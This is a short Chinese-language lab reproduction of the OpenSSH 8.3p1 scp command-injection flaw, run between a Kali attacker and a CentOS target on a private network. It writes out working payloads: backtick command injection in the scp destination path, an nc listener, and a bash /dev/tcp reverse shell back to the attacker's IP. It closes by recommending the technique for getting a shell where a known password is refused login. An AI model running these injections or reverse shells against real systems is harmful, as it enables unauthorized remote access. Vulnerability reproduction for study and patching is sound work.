介绍
2020年6月9日,研究人员Chinmay Pandya在Openssh中发现了一个漏洞,于7月18日公开。OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。目前绝大多数linux系统受影响。深信服安全研究团队依据漏洞重要性和影响力进行评估,作出漏洞通告。
漏洞影响版本
OpenSSH =< 8.3p1
漏洞复现要求
OpenSSH =< 8.3p1
需要知道ssh密码
搭建环境
centOS 7 IP:192.168.7.67
kali2019.4 IP:192.168.7.79
介绍一下scp命令:
下面开始行动:
关闭防火墙,(我没有关闭,在这里我也就不关闭了。)
查看ssh版本吧
1.ssh -V
首先尝试一下利用scp命令,用kali对centOS进行写文件,复制文件
scp 1.txt root@192.168.7.67:'`touch /tmp/test.txt` /tmp'
成功将kali上面的文件传入道centOS7面,和自己创建了文件。
直接进行nc反弹获取shell
先监听一个端口
- nc -lvvp 7777
进行反弹shell
scp test.txt root@192.168.7.67:'`bash -i >& /dev/tcp/192.168.7.79/7777 0>&1`/tmp/test1.txt'
成功拿取权限
总结:该漏洞复现简单,漏洞等级 严重。复现需要知道ssh密码,主要针对知道ssh密码却不给登录,这样就可进行反弹shell获取权限了